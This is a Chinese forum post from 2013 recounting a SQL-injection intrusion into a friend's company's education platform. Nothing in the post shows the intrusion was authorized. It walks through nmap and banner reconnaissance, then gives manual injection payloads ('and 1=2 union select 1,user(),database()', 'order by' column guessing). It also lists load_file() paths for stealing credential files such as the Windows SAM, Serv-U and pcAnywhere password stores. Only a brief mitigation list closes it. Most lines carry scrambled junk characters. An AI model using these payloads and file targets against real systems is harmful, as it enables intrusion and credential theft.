找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2054|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
题记:0 a! X4 Y  B0 K
一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……' J% }% N* T! s) l
第一步:获取需要的信息
7 ?4 o! L1 t# \: b由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。
) ]' m9 W4 V9 g- `! G, V注:以下为保护特用XXX代替敏感信息; `/ Q* F' N! C) F
顺手先PING了一下他们的域名:
! H+ H; d1 ~) n7 i5 i. j9 xping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)
2 H2 K: h3 a+ h3 f64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms  T( L+ F" D$ |( R: q
顺便了解一下TTL,学好基础知识才能一路顺风:
( z5 T$ R. b- f+ zTTL:(Time To Live ) 生存时间
. E5 H! ^- E* i7 x& h9 H/ E指定数据包被路由器丢弃之前允许通过的网段数量。# D% S- L: i9 G8 R. R3 H, H
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。
" t0 D4 b% d0 O" ^  V使用PING时涉及到的 ICMP 报文类型; }# q7 L0 F( b" [9 ?  c! E
一个为ICMP请求回显(ICMP Echo Request)
6 z8 f4 H- w4 U/ A: w  \% g4 Y  C3 ]  |一个为ICMP回显应答(ICMP Echo Reply)+ }; R1 L6 Y( \; Y7 g
TTL 字段值可以帮助我们识别操作系统类型。
" q4 T4 p/ |0 m9 H$ NUNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255% }& X9 M8 T/ l) Q" u
Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
1 p. V. y+ t" {! K3 c' y微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
2 {) O1 V+ ]6 m* _微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32
8 q3 m7 C' r2 J3 {: v& t6 y' n: m当然,返回的TTL值是相同的- p4 c6 M1 D" e$ Y4 d9 }
但有些情况下有所特殊5 W# H0 o$ R, f" D  ]# O, |
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64
+ p/ H! Q8 x! w1 R" Z' q; ^& FFreeBSD 4.1, 4.0, 3.4;: x- a5 P- K' x& r  a9 N
Sun Solaris 2.5.1, 2.6, 2.7, 2.8;
! p/ f; ?! G* s& \( u) K2 g9 oOpenBSD 2.6, 2.7,
- o0 c6 H2 H* c# n. t5 G0 V8 ?6 hNetBSD1 [; L9 q# G0 u1 E' q% ]
HP UX 10.20# ]+ V: m6 l" V1 W, B3 e
ICMP 回显应答的 TTL 字段值为 255
; G& C0 S2 y9 }Windows 95/98/98SE/ |/ P, M% O; a7 W# m! ~( C
Windows ME
; d- p1 O0 E; q5 n! _/ O7 j  a- CICMP 回显应答的 TTL 字段值为 32! P: N/ A5 e5 _5 E8 U
Windows NT4 WRKS
9 I6 I' l; i8 M# ?+ gWindows NT4 Server
6 \; ?: V5 |+ B5 Z- f" GWindows 2000
! Y( Q* `1 i8 _- S# z% W# W3 rWindows XP
, t" B3 \; s5 p+ j, jICMP 回显应答的 TTL 字段值为 128
, q3 `3 g, l2 b8 {  u  i6 h+ D这样,我们就可以通过这种方法来辨别操作系统' A  B8 p+ M  s% W
TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的2550 ^; n4 X& ~. |% {# }
用NMAP扫描一下:) K0 W2 X7 ^! `5 X; h
nmap -sT -O XXX.XXX.XXX.XXX
3 M" w4 [8 Q6 b0 u: ^: V0 s* K如果没有装WinPcap则会弹出提示:' t  U7 I# O9 a9 d' X% g
WARNING: Could not import all necessary WinPcap functions.  You may need to upgr0 l: a1 }4 P2 \# L+ r
ade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(: I( x/ o  {  S4 l
) mode — Nmap may not function completely2 P! v8 S. L) G3 p
TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher  x, g  q7 z" N$ y( U* p: G
and iphlpapi.dll be installed. You seem to be missing one or both of these.  Win, S) `' N) I  c0 {% n$ h; S/ J
pcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an
* {- M# P9 `3 n3 j- Qd later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v
6 m5 o5 g  X8 L! B% B: fersions, you may be able to take iphlpapi.dll from another system and place it i
7 @$ e# S$ A. N2 _, {* t* m& rn your system32 dir (e.g. c:\windows\system32).& @6 ]8 h% |3 G) W5 Q' C% n
QUITTING!, N& |$ v' b% X
到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
/ U$ K+ b+ Z4 ~/ _9 c5 Q安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
( C* @4 [) e6 j# M$ }9 l' b) nInteresting ports on XXX.XXX.XXX.XXX:3 u/ X3 e6 O2 x4 ?5 n
Not shown: 986 closed ports3 P: |- ^  R* t
PORT     STATE    SERVICE
) n+ P% K3 `+ o! d- y6 U21/tcp   open     ftp
; E& L. `3 o* y$ W* R22/tcp   open     ssh
- X/ i& u& K) \1 Q2 o- \23/tcp   open     telnet  ^' [: ^  E: t, X- z* f
80/tcp   open     http
( _/ ]5 M) L! E8 x4 B111/tcp  open     rpcbind  N$ w) m# E4 W- Q, h
135/tcp  filtered msrpc
( O% _& p6 o- U+ }5 I139/tcp  filtered netbios-ssn" r+ b$ ~/ b' e; ?/ M, N+ v# M
445/tcp  filtered microsoft-ds1 ~( M5 d% {' J3 ~! H4 Y% c- I
513/tcp  open     login
9 p& E! y/ o& r3 A7 y( Q( ?514/tcp  open     shell
- O2 a/ S; o3 _2 _+ E# F593/tcp  filtered http-rpc-epmap
  S) b0 L: N* Y( v1720/tcp filtered H.323/Q.931, J1 C6 o0 y' J" _6 U' T/ h
3306/tcp open     mysql
" f1 |4 s" o  y3 U; w4444/tcp filtered krb524
( l" d( Z; N* I) l: hDevice type: WAP
2 O# V0 E$ U! m" mRunning: Linux 2.4.X- ]$ T" }% z3 P. @5 d! O
OS details: DD-WRT (Linux 2.4.35s)
- }, w" H7 K  h/ t9 J, XNetwork Distance: 13 hops
8 X! O% {! q/ Q5 J9 e0 T9 S看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:& W; U3 E( q6 }5 ?
login as:1 o7 l- k5 v7 ~+ u4 z6 K
Telnet23端口也是开着的,用telnet 命令链接一下:
7 p) m/ o- W# J( btelnet XXX.XXX.XXX.XXX0 O& N1 d% x8 ]  s- [: S7 I
提示:2 X: B. o& _& V: ~5 i+ q
Red Hat Enterprise Linux Server release 5.2 (Tikanga)
) g5 ]2 ]/ y( D( bKernel 2.6.18-92.el5PAE on an i686
$ d% H9 n' u. p: i+ r' E2 Zlogin:
6 A1 A6 S5 a% h3 A6 Y获取HTTP头信息:
, |) Y- f7 t: c& U$ w; v3 _' J在本地执行如下PHP代码/ L: E# b- m+ U4 D6 u
<?php$ ]9 C( A3 N! V# o
$url = ‘XXX.XXX.XXX.XXX’;, S! M- A9 H% Q3 f  U8 {
print_r(get_headers($url));
: d$ {  b8 V* Gprint_r(get_headers($url, 1));5 t4 r' c; U6 U" Y$ W
?>
) }4 q3 N0 q1 y) I- W  }5 b) C将以上代码保存为PHP文件,执行:
+ Q" N5 j. k% Q) dArray ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )5 s0 y3 `8 H% }9 ]/ t
现在可以得出结论:
6 _9 t/ j& N! Y: X' S! y* y系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)* B1 O* T+ Q4 i/ k; J. {
内核版本:Kernel 2.6.18-92.el5PAE on an i6867 C9 W4 {! j" A# L/ |: _0 T
WEB服务器版本:nginx/0.7.61" _5 ~1 d$ T/ U" E; @, n6 w
第二步,开始测试寻找漏洞
% {$ t! ]( V" j! D/ |% G- `分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
  L$ ~/ R% i3 U& V1 f1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的
4 a# O- @) v; e1 d0 ~- c2、测试方法:在地址后加 and 1=1 和 and 1=2 测试- V: E6 c4 P/ V1 i( l
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常$ i5 h# F; b5 l  q4 I
http://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误* P1 V' m4 c$ [" k( ^' C6 P
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续
: J% s! x" [5 Z4 M2 F( ~3、手工注入:
. r+ ?, F4 z+ q注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
; K4 C: i$ U, W/ G+ d5 \3.1 猜测当前表字段数
9 }4 ]3 F0 r% E8 O/ F% k: lhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
$ m  T- A/ G" C0 ^  W此处猜测有个简单的算法,都是有技巧的吗,呵呵) }- R  N- b; m% u1 C
算法简单如下:
& |$ N* D! K9 f$ j7 G% v! N第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;: i8 a6 ^/ s* {7 J  F# i) @
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;; W9 T9 e) C% R- \
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
" z8 V- N; X- k以此来判断,是否过界,配合取中算法猜出字段数。4 w! D. _/ L2 d/ s. n4 f3 K
举例:: Y' K4 K, S/ P
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
* O' ]- a1 K! b' F$ a. ]8 Dhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
9 q/ a+ X6 h& ~7 ?6 X. K9 d9 t* N此时3则为我们要找的字段数。  ]+ v3 w, n- f+ R, O& t
3.2 配合union联合查询字段在页面所位置
6 ^" M* k; P- K我们已经知道了字段数为3,此时则可以做如下操作:6 O' E6 \) o7 B5 ?3 j
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,32 h* m& r9 Z6 ]) ?' @) f

# E" c- y' I, e这样就可以测试到哪些字段在页面上有所显示了,如图:/ q& h$ _4 O. Z- T+ t# k' v$ p
" |2 I. R1 o7 R) A
3.3 查敏感信息
: r" a* V8 S/ d  d" }' i- i这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。
5 V/ c* j& d. Ghttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
7 [% @% X: ^: A# n( k3.3.1 先查数据库用户、数据库名,以备后用,如图:
3 [8 s) U3 ?6 N! g; y- e$ V8 H) |( ^+ w& B# e& t' `$ V  f
得到数据库用户为root、数据库名为DBxx;! H; U1 }8 c' r& c
3.3.2 查配置文件% u3 B( u$ z- Y2 I6 C$ ^7 R( W
查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。
" T9 }1 a  N, g$ J查看文件有一定的条件限制:4 b0 i) {* e/ f2 F2 [. u) d
欲读取文件必须在服务器上- Q! K& j* |& _7 ?- v
必须指定文件完整的路径1 u9 M) Q* Z- k
必须有权限读取并且文件必须完全可读, z. {, [4 R5 g+ X# D* N" a; C
欲读取文件必须小于 max_allowed_packet: f8 E& t# f" h$ b( z* C
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
; r6 Q. p2 l8 ?1 I常用的一些:: T+ F9 O5 a4 T$ W
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
; `, v, N4 q% r! G+ C( e# _/usr/local/apache2/conf/httpd.conf
" t" ~) K4 T+ A/ w) ^* C$ C. x/ i7 H& f/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置: u# y& d5 Z# o% r
/usr/local/app/php5/lib/php.ini //PHP相关设置3 ?- z* Q& [" q- P
/etc/sysconfig/iptables //从中得到防火墙规则策略7 s1 |" _0 N: D, V
/etc/httpd/conf/httpd.conf // apache配置文件3 w* v# Q6 w: ?
/etc/rsyncd.conf //同步程序配置文件( F: U/ c# x; s$ g* W3 V
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.6 O0 l5 r$ S* q4 E2 P
/etc/my.cnf //mysql的配置文件( h3 J/ n& n' {5 |2 c& o* g' R% K& z
/etc/redhat-release //系统版本1 F* X8 L; \1 R* h
/etc/issue+ [8 x  b6 L, h; _+ \
/etc/issue.net
  V% u, ?2 n% M! L. D$ a, o2 Dc:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码* _( s$ c( e- u/ O
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码# w% c$ o0 h) H) S' V
c:\Program Files\Serv-U\ServUDaemon.ini
9 d! J) ?! j! p% |) t: C' `! wc:\windows\my.ini //MYSQL配置文件$ b7 i/ K& r% a
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件9 J( ?9 X2 Q9 n% H
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,
; v* D  ~6 r4 ?c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
$ `/ N" I8 G. Z: q& a& p/ N+ M$ Y% C+ @c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此2 v4 C# C6 l# l/ r) ~8 r" v# Q  Q, A7 n
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
7 n: x' X; U& \! L4 UC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件3 _: H2 E6 b7 ?% o1 z7 H' Z% v
//存储了pcAnywhere的登陆密码
8 v$ }  m! B! ]# G) i% G) D由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。
9 d+ S4 D/ L% Z8 G- r. J% `4 R! n9 b, y这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。6 J+ n; t- r* L% f; m' H0 S+ t( G  T
最后:防范措施5 }* e  G- ?8 i0 M$ N8 Q
1、修复PHP注入漏洞;
2 {0 _* G& [! K& R2、Mysql使用普通权限的用户;& D0 ]% Q+ Q4 O& B% C% X6 D
3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表